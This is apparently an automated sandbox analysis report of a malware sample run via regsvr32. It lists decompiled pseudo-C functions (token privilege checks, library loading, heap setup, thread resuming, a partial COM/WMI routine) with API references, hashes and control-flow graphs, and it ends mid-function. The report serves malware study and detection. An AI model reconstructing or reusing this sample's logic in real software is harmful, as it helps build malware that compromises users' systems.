                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E0536F05C(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _t5;
                                                                                                                                                                        				struct HINSTANCE__* _t7;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                        				_t22 = __edx;
                                                                                                                                                                        				_t5 = E05369DD8(_a4);
                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                        				_v8 = _t5;
                                                                                                                                                                        				_push(_t5);
                                                                                                                                                                        				if(_a4 != 0xf43) {
                                                                                                                                                                        					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t7 = GetModuleHandleA();
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t7 != 0) {
                                                                                                                                                                        					_t10 = E0536F011(_t12, _t22, _t7); // executed
                                                                                                                                                                        					_t25 = _t10;
                                                                                                                                                                        				}
                                                                                                                                                                        				E05368B9C( &_v8);
                                                                                                                                                                        				return _t25;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,0537CA50,?,0536652B,?), ref: 0536F07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,0537CA50,?,0536652B,?), ref: 0536F08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: 25f32da69277df73c6ede5021464f02f43023f1a38a39ca9bb2fc9b8482948ee
                                                                                                                                                                        • Instruction ID: 785e16c45824593e930ce4d554a3483c6e4b539ab13c7736417daede5066f22f
                                                                                                                                                                        • Opcode Fuzzy Hash: 25f32da69277df73c6ede5021464f02f43023f1a38a39ca9bb2fc9b8482948ee
                                                                                                                                                                        • Instruction Fuzzy Hash: CBF0EC32710118ABCB14ABADF8498AAB7EDEF48250710813EF506D7158EEB0DE4187A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 320 536c8c9-536c8e8 call 536c79e 323 536c983-536c986 320->323 324 536c8ee-536c905 call 536c7f5 320->324 327 536c907-536c928 324->327 328 536c965-536c973 FindCloseChangeNotification 324->328 327->328 334 536c92a-536c92c 327->334 329 536c975-536c980 call 5368bf4 328->329 330 536c981 328->330 329->330 330->323 335 536c92e-536c931 334->335 336 536c958-536c963 334->336 337 536c934-536c943 335->337 336->328 340 536c955-536c957 337->340 341 536c945-536c951 337->341 340->336 341->337 342 536c953 341->342 342->336
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E0536C8C9(void* __ecx, void* __esi) {
                                                                                                                                                                        				intOrPtr* _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				short _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                        				char _t37;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                        				char _t45;
                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                        
                                                                                                                                                                        				_t37 = 0;
                                                                                                                                                                        				_v28 = 0x500;
                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_t20 = E0536C79E(__ecx);
                                                                                                                                                                        				_v16 = _t20;
                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                        					_push( &_v24);
                                                                                                                                                                        					_t44 = 2;
                                                                                                                                                                        					_t21 = E0536C7F5(_t44); // executed
                                                                                                                                                                        					_t48 = _t21;
                                                                                                                                                                        					_v20 = _t48;
                                                                                                                                                                        					if(_t48 == 0) {
                                                                                                                                                                        						L10:
                                                                                                                                                                        						FindCloseChangeNotification(_v16);
                                                                                                                                                                        						if(_t48 != 0) {
                                                                                                                                                                        							E05368BF4( &_v20, _t37);
                                                                                                                                                                        						}
                                                                                                                                                                        						return _t45;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(0x220);
                                                                                                                                                                        					_push(0x20);
                                                                                                                                                                        					_push(2);
                                                                                                                                                                        					_push( &_v32);
                                                                                                                                                                        					_t29 =  *0x537f820; // 0x546faa0
                                                                                                                                                                        					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					if( *_t48 <= 0) {
                                                                                                                                                                        						L9:
                                                                                                                                                                        						_t31 =  *0x537f820; // 0x546faa0
                                                                                                                                                                        						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                        					_t33 = _t9;
                                                                                                                                                                        					_v8 = _t33;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                        						_push( *_t33);
                                                                                                                                                                        						_t34 =  *0x537f820; // 0x546faa0
                                                                                                                                                                        						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t37 = _t37 + 1;
                                                                                                                                                                        						_t33 = _v8 + 8;
                                                                                                                                                                        						_v8 = _t33;
                                                                                                                                                                        						if(_t37 <  *_t48) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t45 = 1;
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t20;
                                                                                                                                                                        			}





















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0536C79E: GetCurrentThread.KERNEL32 ref: 0536C7B1
                                                                                                                                                                          • Part of subcall function 0536C79E: OpenThreadToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7B8
                                                                                                                                                                          • Part of subcall function 0536C79E: GetLastError.KERNEL32(?,?,0536C8E3,00000000,05360000), ref: 0536C7BF
                                                                                                                                                                          • Part of subcall function 0536C79E: OpenProcessToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7E4
                                                                                                                                                                          • Part of subcall function 0536C7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05360000,00000000,00000000,?,0536C876,00000000,00000000,?,0536C89F), ref: 0536C810
                                                                                                                                                                          • Part of subcall function 0536C7F5: GetLastError.KERNEL32(?,0536C876,00000000,00000000,?,0536C89F,00001644,?,0536DFCE), ref: 0536C817
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05360000), ref: 0536C96D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1806447117-0
                                                                                                                                                                        • Opcode ID: d85f6515f2fd2b24df21c34a3478bcf6ccc875d28cdf7a003be175e7a81695e7
                                                                                                                                                                        • Instruction ID: 7ebb3d2974c06f19f7c5a8401ac19c74753764a515233da7ca0dd56ff08f248b
                                                                                                                                                                        • Opcode Fuzzy Hash: d85f6515f2fd2b24df21c34a3478bcf6ccc875d28cdf7a003be175e7a81695e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C216A32A0020DAFDB10DFA9D885AAEBBF8FF08600F508469E551E7155DB70EE418B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 343 5366298-53662b1 call 5366412 GetOEMCP call 536df3d 348 53662b6-53662e1 call 5373bd5 343->348 349 53662b3-53662b4 343->349 353 53662e3-53662e9 348->353 354 53662eb-53662f1 call 536d804 348->354 350 536632b 349->350 355 5366305-5366311 353->355 357 53662f6-53662fd 354->357 358 5366323 call 53635a1 355->358 359 5366313-5366318 call 536611b 355->359 360 53662ff 357->360 361 536631a-5366321 357->361 365 5366328-536632a 358->365 359->365 360->355 361->358 361->365 365->350
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05366298(void* __fp0) {
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        				intOrPtr _t17;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        
                                                                                                                                                                        				_t32 = __fp0;
                                                                                                                                                                        				E05366412();
                                                                                                                                                                        				GetOEMCP();
                                                                                                                                                                        				_t13 = E0536DF3D(__fp0); // executed
                                                                                                                                                                        				 *0x537f81c = _t13;
                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
                                                                                                                                                                        					_t14 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t2 = _t14 + 0x224; // 0x5360000
                                                                                                                                                                        					E05373BD5( *_t2);
                                                                                                                                                                        					_t26 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t25 = _t27;
                                                                                                                                                                        					__eflags =  *(_t26 + 0x1898) & 0x00010000;
                                                                                                                                                                        					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
                                                                                                                                                                        						_t7 = _t26 + 0x224; // 0x5360000, executed
                                                                                                                                                                        						_t26 =  *_t7;
                                                                                                                                                                        						_t16 = E0536D804( *_t7); // executed
                                                                                                                                                                        						__eflags = _t16;
                                                                                                                                                                        						_t17 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
                                                                                                                                                                        							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
                                                                                                                                                                        								L10:
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        								return 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							L9:
                                                                                                                                                                        							E053635A1();
                                                                                                                                                                        							goto L10;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_t20 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						E0536611B(_t25, _t26, __eflags, _t32);
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t13 + 1;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOEMCP.KERNEL32 ref: 0536629D
                                                                                                                                                                          • Part of subcall function 0536DF3D: GetCurrentProcessId.KERNEL32 ref: 0536DF64
                                                                                                                                                                          • Part of subcall function 0536DF3D: GetLastError.KERNEL32 ref: 0536E05E
                                                                                                                                                                          • Part of subcall function 0536DF3D: GetSystemMetrics.USER32(00001000), ref: 0536E06E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentErrorLastMetricsProcessSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1196160345-0
                                                                                                                                                                        • Opcode ID: c180cab3bf0bb3307e2d9146eab6da62376427e8198e854d2aa8d63c0a6b8a83
                                                                                                                                                                        • Instruction ID: aeff144b29f81ccd3766ce033f3cc6e8f6e69ad7d72b81822e9cc030bf33af8c
                                                                                                                                                                        • Opcode Fuzzy Hash: c180cab3bf0bb3307e2d9146eab6da62376427e8198e854d2aa8d63c0a6b8a83
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E017C31A142069EC325FBA8E54AAE5BBE9BB4A350F15C27DE006CF129CBB04481CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 366 536c879-536c892 368 536c896-536c8a3 call 536c862 366->368 369 536c894-536c895 366->369 372 536c8a5-536c8a8 368->372 373 536c8b9-536c8c4 FindCloseChangeNotification 368->373 374 536c8b5-536c8b7 372->374 375 536c8aa-536c8af 372->375 376 536c8c6-536c8c8 373->376 374->376 375->374
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536C879(void* __ecx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t12 =  *0x537f820; // 0x546faa0
                                                                                                                                                                        				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                        					_t14 = E0536C862(); // executed
                                                                                                                                                                        					_t23 = _t14;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						FindCloseChangeNotification(_v8);
                                                                                                                                                                        						_t17 = _t23;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if(_v8 != _t14) {
                                                                                                                                                                        							_t18 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t17 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return _t13;
                                                                                                                                                                        				}
                                                                                                                                                                        			}











                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536632E() {
                                                                                                                                                                        				intOrPtr _t3;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        				 *((intOrPtr*)(_t3 + 0x2c))( *0x537f83c, 0xffffffff);
                                                                                                                                                                        				ExitProcess(0);
                                                                                                                                                                        			}





                                                                                                                                                                        APIs
                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 05366345
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05368BDE(long _a4) {
                                                                                                                                                                        				void* _t2;
                                                                                                                                                                        
                                                                                                                                                                        				_t2 = RtlAllocateHeap( *0x537f900, 8, _a4); // executed
                                                                                                                                                                        				return _t2;
                                                                                                                                                                        			}





                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0536DA57(void* __ecx) {
                                                                                                                                                                        				signed int _t4;
                                                                                                                                                                        
                                                                                                                                                                        				_t4 = ResumeThread( *(__ecx + 4));
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~_t4 & 0x00000001;
                                                                                                                                                                        			}





                                                                                                                                                                        APIs
                                                                                                                                                                        • ResumeThread.KERNELBASE(?,0536D8C2,?,?,00000001), ref: 0536DA5F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05368BC9() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        
                                                                                                                                                                        				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                        				 *0x537f900 = _t1;
                                                                                                                                                                        				return _t1;
                                                                                                                                                                        			}





                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,05366502), ref: 05368BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E0536DA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				signed int* _t36;
                                                                                                                                                                        				signed int* _t39;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t36 = _a8;
                                                                                                                                                                        				_t28 = _t36[1];
                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                        					_t39 = _t36[2];
                                                                                                                                                                        					do {
                                                                                                                                                                        						_a8 = _a8 & 0x00000000;
                                                                                                                                                                        						if(_t39[2] > 0) {
                                                                                                                                                                        							_t31 = _t39[3];
                                                                                                                                                                        							_t22 = _a4 + 0x24;
                                                                                                                                                                        							_v12 = _a4 + 0x24;
                                                                                                                                                                        							_v8 = _t39[3];
                                                                                                                                                                        							while(E0536A0A3(_t22,  *_t31) != 0) {
                                                                                                                                                                        								_t26 = _a8 + 1;
                                                                                                                                                                        								_t31 = _v8 + 4;
                                                                                                                                                                        								_a8 = _t26;
                                                                                                                                                                        								_t22 = _v12;
                                                                                                                                                                        								_v8 = _v8 + 4;
                                                                                                                                                                        								if(_t26 < _t39[2]) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								} else {
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L8;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                        						}
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_t39 =  &(_t39[4]);
                                                                                                                                                                        						_t28 = _t28 - 1;
                                                                                                                                                                        					} while (_t28 != 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				Sleep(0xa);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}










                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 0536DAD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 8296c352f53417caba932f69dd2073ca2ab6422b3ace2e1f5a63de1e9b908306
                                                                                                                                                                        • Instruction ID: 6133b844420d525ea636ef9e08345a3be06152b00a7d0c47336591675b1af880
                                                                                                                                                                        • Opcode Fuzzy Hash: 8296c352f53417caba932f69dd2073ca2ab6422b3ace2e1f5a63de1e9b908306
                                                                                                                                                                        • Instruction Fuzzy Hash: 98111B75B08205AFDB14CF99C585AA9B7E8FB49324F18C96DE85A9B304D7B0E940CB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0536EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                        				char _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				char _v48;
                                                                                                                                                                        				char _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				char* _v72;
                                                                                                                                                                        				signed short _v80;
                                                                                                                                                                        				signed int _v84;
                                                                                                                                                                        				char _v88;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				char _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				char _v104;
                                                                                                                                                                        				char _v616;
                                                                                                                                                                        				intOrPtr* _t159;
                                                                                                                                                                        				char _t165;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				signed int _t173;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				intOrPtr* _t187;
                                                                                                                                                                        				signed int _t188;
                                                                                                                                                                        				signed int _t192;
                                                                                                                                                                        				intOrPtr* _t193;
                                                                                                                                                                        				intOrPtr _t200;
                                                                                                                                                                        				intOrPtr* _t205;
                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                        				signed int _t209;
                                                                                                                                                                        				intOrPtr* _t210;
                                                                                                                                                                        				intOrPtr _t212;
                                                                                                                                                                        				intOrPtr* _t213;
                                                                                                                                                                        				signed int _t214;
                                                                                                                                                                        				char _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				signed int _t219;
                                                                                                                                                                        				signed int _t230;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				signed int _t242;
                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                        				signed int _t244;
                                                                                                                                                                        				signed int _t245;
                                                                                                                                                                        				intOrPtr* _t247;
                                                                                                                                                                        				intOrPtr* _t251;
                                                                                                                                                                        				signed int _t252;
                                                                                                                                                                        				intOrPtr* _t253;
                                                                                                                                                                        				void* _t255;
                                                                                                                                                                        				intOrPtr* _t261;
                                                                                                                                                                        				signed int _t262;
                                                                                                                                                                        				signed int _t283;
                                                                                                                                                                        				signed int _t289;
                                                                                                                                                                        				char* _t298;
                                                                                                                                                                        				void* _t320;
                                                                                                                                                                        				signed int _t322;
                                                                                                                                                                        				intOrPtr* _t323;
                                                                                                                                                                        				intOrPtr _t324;
                                                                                                                                                                        				signed int _t327;
                                                                                                                                                                        				intOrPtr* _t328;
                                                                                                                                                                        				intOrPtr* _t329;
                                                                                                                                                                        
                                                                                                                                                                        				_v32 = _v32 & 0x00000000;
                                                                                                                                                                        				_v60 = _v60 & 0x00000000;
                                                                                                                                                                        				_v56 = __edx;
                                                                                                                                                                        				_v100 = __ecx;
                                                                                                                                                                        				_t159 = E0536E400(__ecx);
                                                                                                                                                                        				_t251 = _t159;
                                                                                                                                                                        				_v104 = _t251;
                                                                                                                                                                        				if(_t251 == 0) {
                                                                                                                                                                        					return _t159;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t320 = E05368BDE(0x10);
                                                                                                                                                                        				_v36 = _t320;
                                                                                                                                                                        				_pop(_t255);
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L53:
                                                                                                                                                                        					E05368BF4( &_v60, 0xfffffffe);
                                                                                                                                                                        					E0536E4B4( &_v104);
                                                                                                                                                                        					return _t320;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t165 = E05369DF2(_t255, 0x3a7);
                                                                                                                                                                        				 *_t328 = 0xae7;
                                                                                                                                                                        				_v52 = _t165;
                                                                                                                                                                        				_t166 = E05369DF2(_t255);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_v56);
                                                                                                                                                                        				_v20 = _t166;
                                                                                                                                                                        				_push(_t166);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_t322 = E05369A5A(_t165);
                                                                                                                                                                        				_v60 = _t322;
                                                                                                                                                                        				E05368BAF( &_v52);
                                                                                                                                                                        				E05368BAF( &_v20);
                                                                                                                                                                        				_t329 = _t328 + 0x20;
                                                                                                                                                                        				if(_t322 != 0) {
                                                                                                                                                                        					_t323 = __imp__#2;
                                                                                                                                                                        					_v40 =  *_t323(_t322);
                                                                                                                                                                        					_t173 = E05369DF2(_t255, 0x886);
                                                                                                                                                                        					_v20 = _t173;
                                                                                                                                                                        					_v52 =  *_t323(_t173);
                                                                                                                                                                        					E05368BAF( &_v20);
                                                                                                                                                                        					_t324 = _v40;
                                                                                                                                                                        					_t261 =  *_t251;
                                                                                                                                                                        					_t252 = 0;
                                                                                                                                                                        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                        					__eflags = _t178;
                                                                                                                                                                        					if(_t178 != 0) {
                                                                                                                                                                        						L52:
                                                                                                                                                                        						__imp__#6(_t324);
